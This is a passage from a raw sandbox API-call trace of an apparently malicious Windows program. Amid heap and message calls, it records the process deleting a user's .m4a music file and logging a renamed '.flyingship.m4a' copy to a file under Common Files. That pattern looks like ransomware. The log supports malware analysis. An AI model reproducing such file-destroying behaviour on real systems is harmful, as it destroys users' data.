hHeap=0x8a0000) returned 1 [0185.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0185.796] WriteFile (in: hFile=0x120, lpBuffer=0xbca008*, nNumberOfBytesToWrite=0xf5b7, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesWritten=0x87eae0*=0xf5b7, lpOverlapped=0x0) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0185.797] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0185.798] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0185.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0185.798] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.799] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.799] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.799] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.799] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0185.799] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.799] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.799] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0185.800] FreeLibrary (hLibModule=0x75990000) returned 1 [0185.800] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.800] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0185.820] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.820] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFilePart=0x0) returned 0x68 [0185.821] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x13fccf00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0x90af58 [0185.821] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\egffoaa4l\\iytlsfhuhj3z6gymj.m4a")) returned 1 [0185.824] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7de63150, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x3328d30, ftLastAccessTime.dwHighDateTime=0x1d5db32, ftLastWriteTime.dwLowDateTime=0x13fccf00, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf5b7, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="iytLsFHuHj3z6gYMj.m4a", cAlternateFileName="IYTLSF~1.M4A")) returned 0 [0185.825] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0185.825] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0185.825] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.825] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0185.825] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0185.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0185.826] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.826] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.826] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0185.826] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0185.826] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0185.826] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0185.827] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.828] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0185.828] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.828] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0185.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0185.828] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.828] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0185.829] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x23a7, lpOverlapped=0x0) returned 1 [0185.829] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0185.829] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x23a7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0185.829] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0185.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0185.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0185.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0185.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\n", cchWideChar=118, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 118 [0185.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x76) returned 0x8afe68 [0185.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\n", cchWideChar=118, lpMultiByteStr=0x8afe68, cbMultiByte=118, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\iytLsFHuHj3z6gYMj.flyingship.m4a\r\n", lpUsedDefaultChar=0x0) returned 118 [0185.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0185.829] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0185.829] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8afe68 | out: hHeap=0x8a0000) returned 1 [0185.829] WriteFile (in: hFile=0x120, lpBuffer=0x9c0c88*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c0c88*, lpNumberOfBytesWritten=0x87f43c*=0x75, lpOverlapped=0x0) returned 1 [0185.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0185.830] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0185.830] CloseHandle (hObject=0x120) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0185.845] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0185.847] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0185.847] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0185.847] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.848] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0185.848] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.848] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0185.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0185.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0185.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.848] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0185.848] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0185.848] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0185.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0185.849] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0185.849] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 